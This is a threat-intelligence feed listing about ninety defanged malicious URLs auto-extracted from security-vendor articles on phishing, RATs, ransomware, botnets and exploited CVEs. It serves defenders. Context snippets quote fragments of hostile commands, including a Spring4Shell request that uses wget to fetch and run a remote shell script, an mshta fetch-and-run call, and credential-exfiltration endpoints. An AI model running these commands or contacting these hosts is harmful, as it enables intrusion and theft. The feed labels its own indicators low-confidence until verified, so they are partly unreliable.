Indicators of compromise
93 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| url | http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF | [.]com domain, the message embedded an IPv6-mapped address: hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 . That notation represents IPv4 address 103[.]193 | Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters GBHackers | · 9h ago |
| url | http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF | nder domain used in the Romanian banking phishing email URL hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 IPv6-mapped IP-literal URL embedded in the bankin | New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools Cyber Security News | · 10h ago |
| url | http://aa.amazingshield[ | per[.]info/aa.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 1d ago |
| url | https://drelto[ | yz/33244556546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain s | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 1d ago |
| url | https://stryper[ | sHelper\docro\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia R | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 1d ago |
| url | https://archive[ | 498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemorySca | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | https://connection[ | dpoint, passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage: | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | https://granderevolucao[ | r URL Malicious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET P | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | https://ia601808[ | er.exe : legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | https://volmira[ | intained. After retrieving the domains, the malware queries hxxps://volmira[.]site/api/ext/version to obtain the extension version. The | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | https://zaviro[ | two C2 endpoints: hxxps://volmira[.]site//api/savecreds and hxxps://zaviro[.]online//api/v1/fingerprint . The following POST request wa | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | http://www[ | attempting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not re | The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions Elastic Security Labs | · 1d ago |
| url | https://proof.gitprogram[ | gleBamboo Phishing, exploit delivery, and C2 infrastructure hxxps://proof.gitprogram[.]com/a4/j8 URL JungleBamboo September 2 phishing URL servin | China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks GBHackers | · 3d ago |
| url | https://apimantax[ | cted outbound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically r | New Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims Cyber Security News | · 4d ago |
| url | http://3.88.162[ | 026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second-stage payload download URL 2026-09-07 | Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access GBHackers | · 4d ago |
| url | http://log.gitclone[ | Actor IP exploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-420 | Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access GBHackers | · 4d ago |
| url | http://3.88.162[ | ]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash /tmp/.z — 513a907b69edffc3cb77a4 | JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control Cyber Security News | · 4d ago |
| url | http://log.gitclone[ | [.]88 , 137.184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Ha | JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control Cyber Security News | · 4d ago |
| url | https://apimantax[ | lution. Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and publ | Mantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files GBHackers | · 4d ago |
| url | http://3.88.162[ | 026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second load of payload after CVE-2026-42018/ | Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329 Wiz Blog | · 5d ago |
| url | http://log.gitclone[ | loiting CVE-2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2 | Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329 Wiz Blog | · 5d ago |
| url | https://stro7121.blob.core.windows[ | xe interpreter to download and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py script | SloppyRAT: A New Tool For Ransomware Attacks Zscaler ThreatLabz | · 5d ago |
| url | http://167.148.195[ | 172ec Brazilian financial campaign malware or tool hash URL hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Download location for SockTz versi | Hackers Use Claude and GPT-Powered Tools to Help Breach Government and Financial Networks Cyber Security News | · 5d ago |
| url | http://45.142.193[ | ing followed by Base64 encoding using certutil Download URL hxxp://45.142.193[.]132:8000/lsa_collect.exe Download location for LSA bootkey | Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers GBHackers | · 5d ago |
| url | https://api-prod.secboxes[ | ad.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-prod.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evid | China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks GBHackers | · 5d ago |
| url | https://download.secboxes[ | ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://download.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api- | China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks GBHackers | · 5d ago |
| url | https://evidence.msbenefit[ | od.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evidence.msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki | China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks GBHackers | · 5d ago |
| url | https://project.secboxes[ | n[.]com Hostname TA412 BlueMoon exploit page September 2026 hxxps://project.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps:// | China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks GBHackers | · 5d ago |
| url | https://recommendation-letter.secboxes[ | ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://recommendation-letter.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps:// | China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks GBHackers | · 5d ago |
| url | https://zki0y83.msbenefit[ | .msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki0y83.msbenefit[.]com:443/feed URL Download URL August 2026 extension-manage | China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks GBHackers | · 5d ago |
| url | https://kr[ | 2 endpoint for the reverse TCP proxy PowerShell payload URL hxxps://kr[.]cedar2glanz[.]ru/jewel[.]js Secondary PowerShell payload f | ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools Cyber Security News | · 6d ago |
| url | https://phys[ | for the verification.google branch PowerShell download URL hxxps://phys[.]stunned-amniotic[.]com/hub[.]log ZIP payload retrieved by | ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools Cyber Security News | · 6d ago |
| url | https://telegra[ | loader observed at the Ukrainian organization Dead-drop URL hxxps://telegra[.]ph/Functions-04-03 Public page used by the Amatera branch | ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools Cyber Security News | · 6d ago |
| url | https://146[ | s. The initial stager downloads a second-stage payload from hxxps://146[.]103[.]99[.]177:8443/0c5b76709523, decodes it, and XOR-decr | Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT GBHackers | · 6d ago |
| url | https://<account-id>.acemlnd[ | s do not point at the brand domain at all – they look like: hxxps://<account-id>.acemlnd[.]com/<tracking-token> hxxps://<brand-subdomain>.activehoste | ASCII smuggling crosses over from AI prompt injection to phishing evasion Microsoft Security Blog | · 12d ago |
| url | https://<brand-subdomain>.activehosted[ | k like: hxxps://<account-id>.acemlnd[.]com/<tracking-token> hxxps://<brand-subdomain>.activehosted[.]com/<tracking-token> Most of the flagged messages carried | ASCII smuggling crosses over from AI prompt injection to phishing evasion Microsoft Security Blog | · 12d ago |
| url | http://167.148.195[ | a2cf34f0af1afe161f123a3d200e77f6c6f41b81bf6ae66ee172ec URL: hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Additional Resources Operation Esc | Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America Palo Alto Unit 42 | · 12d ago |
| url | http://www.gehie246[ | e indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[.]cn → hxxp://www.gehie246[ | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 13d ago |
| url | https://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[ | 684.BPSE.CONTRATOS.DIGITAIS.pdf Link from the message text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortc | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 14d ago |
| url | http://webhook[ | o contains a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. | Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations Security Affairs | · 18d ago |
| url | http://159.89.156[ | Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.]190/.y/pty3 hxxp://159.89. | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| url | http://165.227.78[ | nv : Body > < / soapenv : Envelope > We think that this URL hxxp://165.227.78[.]159/wl.php is used for the reporting purpose. Because, the | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| url | http://y.fd6fq54s6df541q23sdxfg[ | .233[.]35 68.66.253[.]100 185.61.149[.]22 Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[. | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| url | http://192.168.0[ | ted a session token that is reflected in the following URL: hxxp[:]//192.168.0[.]1/WCYCPJQAHXBRCQSC/userRpm/Index.htm As the session toke | A Deep Dive Into Attempted Exploitation of CVE-2023 Palo Alto Unit 42 | · 27d ago |
| url | http://127.0.0[ | CHANNEL #tuxbot TABLE_IRC_NICK_PREFIX tux TABLE_HTTP_C2_URL hxxp[:]//127.0.0[.]1/cmd TABLE_THINKPHP_PAYLOAD Full HTTP GET request (312 | TuxBot v3: Inside an IoT Botnet Framework With LLM Palo Alto Unit 42 | · 27d ago |
| url | http://feed43[ | rvers 185.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · 29d ago |
| url | http://feeds.rapidfeeds[ | 622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com/88604/ Script to Decrypt Dead Drop Resolvers 1 2 3 4 5 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · 29d ago |
| url | http://www.webrss[ | 66706728852850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.] | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · 29d ago |
| url | https://bjm9.blogspot[ | WildFire's analysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTT | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · 29d ago |
| url | https://pastebin[ | n to download a script from a Pastebin URL, specifically at hxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as the | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · 29d ago |
| url | https://static.wixstatic[ | t’s footer that attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : Figu | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · 29d ago |
| url | http://www.bitly[ | nd execute the following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · 29d ago |
| url | http://163.123.143[ | and executed, to accommodate different Linux architectures: hxxp://163.123.143[.]126/bins/dark.x86 hxxp://163.123.143[.]126/bins/dark.mips | Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://212.192.241[ | ng more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a diagram illustrating the campaig | Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://2.56.59[ | s and found two URLs hosting more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a di | Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://31.210.20[ | URLs in the malware samples that hosted two shell scripts: hxxp://31.210.20[.]100/lolol[.]sh hxxp://212.192.241[.]72/lolol[.]sh The shel | Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices Palo Alto Unit 42 | · 29d ago |
| url | http://185.225.74[ | g bot clients to accommodate different Linux architectures: hxxp://185.225.74[.]251/armv4l hxxp://185.225.74[.]251/armv5l hxxp://185.225.7 | IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits Palo Alto Unit 42 | · 29d ago |
| url | http://zvub[ | o download a shell script downloader as a file named y from hxxp://zvub[.]us/ . If executed, the shell script downloader would downl | IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits Palo Alto Unit 42 | · 29d ago |
| url | http://games.my-homeip[ | the RC4 cipher with the same key “78563412”. It connects to hxxp://games.my-homeip[.]com:443/ks8d[ip address]akspbu.txt by using the HTTP POST | Bisonal Malware Used in Attacks Against Russia and South Korea Palo Alto Unit 42 | · 29d ago |
| url | http://178.16.54[ | th several malware samples (e.g., the binary retrieved from hxxp[:]//178.16.54[.]109/st.exe ) associated with Phorpiex (aka Trik), a long | Almost Half of Malware Samples Communicate Direct to IP Palo Alto Unit 42 | · 29d ago |
| url | http://139.155.2[ | ava class file from a remote server. The EvilObj.class from hxxp://139.155.2[.]105:8081 contains the decompiled Java code as seen in Figu | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | http://150.60.139[ | s and execute them. The first file downloaded was hosted at hxxp://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd , which cont | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | http://161.35.184[ | e above, the server would download a Java class file from a hxxp://161.35.184[.]54:9998/V8.class URL, which responds with a Java class fil | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | http://165.22.2[ | that provides the Java class that installs a coinminer. The hxxp://165.22.2[.]186:80/wp-content/themes/twentyseventeen/Exploit.class res | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | http://2.57.121[ | cessing this URL, the server would access a Java class from hxxp://2.57.121[.]36/Rjava.class , which contained the decompiled code seen | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | http://68.183.165[ | ommand attempts to download and execute an application from hxxp://68.183.165[.]105:80/wp-content/themes/twentyseventeen/xmrig64.exe , whi | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | http://[hostname | The HTTP POST requests would be sent to the following URLs: hxxp://[hostname].[username]8.pef.mur.1ma[.]xyz/ hxxp://[hostname].[username | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | https://[hostname | [.]xyz/ hxxp://[hostname].[username]5.pef.mur.1ma[.]xyz:53/ hxxps://[hostname].[username]4.pef.mur.1ma[.]xyz/ The DNS tunneling involves | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · 29d ago |
| url | https://cdn.discordapp[ | cious. The hosted file is retrieved from the following URL: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbop | Threat Brief: Ongoing Russia and Ukraine Cyber Activity Palo Alto Unit 42 | · 29d ago |
| url | https://akamaitechcloudservices[ | d4c310c262a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa417 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://azuredeploystore[ | 74e059cf1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff9 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://azureonlinestorage[ | 030cf763237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://glcloudservice[ | f1d0f17e0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f25 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://msedgepackageinfo[ | de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://msstorageazure[ | e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://msstorageboxes[ | 551906bafb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://officeaddons[ | b4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://officestoragebox[ | 68b769f333a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efb | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://pbxcloudeservices[ | 0024533510ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub accou | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://pbxsources[ | 14c57680de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98e | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://raw.githubusercontent[ | name includes a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request l | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://sourceslabs[ | fb15316245b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308b | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://visualstudiofactory[ | ee1cd64d0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cf | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | https://zacharryblogs[ | af32257fc2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53fae | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · 29d ago |
| url | http://107.174.133[ | atwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' Upon further anal | CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated) Palo Alto Unit 42 | · 29d ago |
| url | http://checkblacklistwords[ | e PoC code to GitHub. However, the HTTP response to the URL hxxp://checkblacklistwords[.]eu/ has a Last-Modified field that is set to Sun, 16 Jul 2 | Fake CVE-2023 Palo Alto Unit 42 | · 29d ago |
| url | http://154[ | n IDs targeted by the Chrome “auto” modes. UPLOAD0623URL = "hxxp://154[.]58[.]204[.]15:8080" # Change to your server MAX0623SLEEP = | PurpleBravo’s Targeting of the IT Software Supply Chain Recorded Future | · Jul 22, 2026 |
| url | http://endpoint-api-v1[ | t downloads the payload disk image over cleartext HTTP from hxxp://endpoint-api-v1[.]com/d/f1b24e/download , retrying up to three times, and sa | CrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper Security Affairs | · Jul 14, 2026 |
| url | https://iplogger[ | r, a legitimate visitor-tracking service. The specific URL, hxxps://iplogger[.]com/mnWD, appeared across multiple distinct payloads spann | Fake VPN and 7-Zip Apps Turn Victims Into Residential Proxy Nodes Security Affairs | · Jul 9, 2026 |
| url | http://45.131.66[ | ion) Command-and-control: 45.131.66[.]106, with a beacon to hxxp://45.131.66[.]106:4444/beacon every 30 minutes Claimed staging server: 6 | AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack The Hacker News | · Jul 2, 2026 |
| url | https://continuetogo[ | itten, TA453, and APT42 (along with its forerunner UNC788). hxxps[:]//continuetogo[.]me/Sec=Tab=settings/id=xxxxx=xxxxx/continue-to-settings. | Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank Recorded Future | · Jun 23, 2026 |
| url | https://mailer-daemon[ | me/Sec=Tab=settings/id=xxxxx=xxxxx/continue-to-settings.php hxxps[:]//mailer-daemon[.]net/file=sharing=system/file.id.X=xxxxxx/continue-to-set | Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank Recorded Future | · Jun 23, 2026 |
| url | https://tinyurl[ | a412201039105d86 2d5f2bf12085d41cb18a933 98afef0be8dfb9c229 hxxps[:]//tinyurl[.]ink/8tio97cy/Iran%20nuke.docx 28 February 2022 Table 2: | Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank Recorded Future | · Jun 23, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.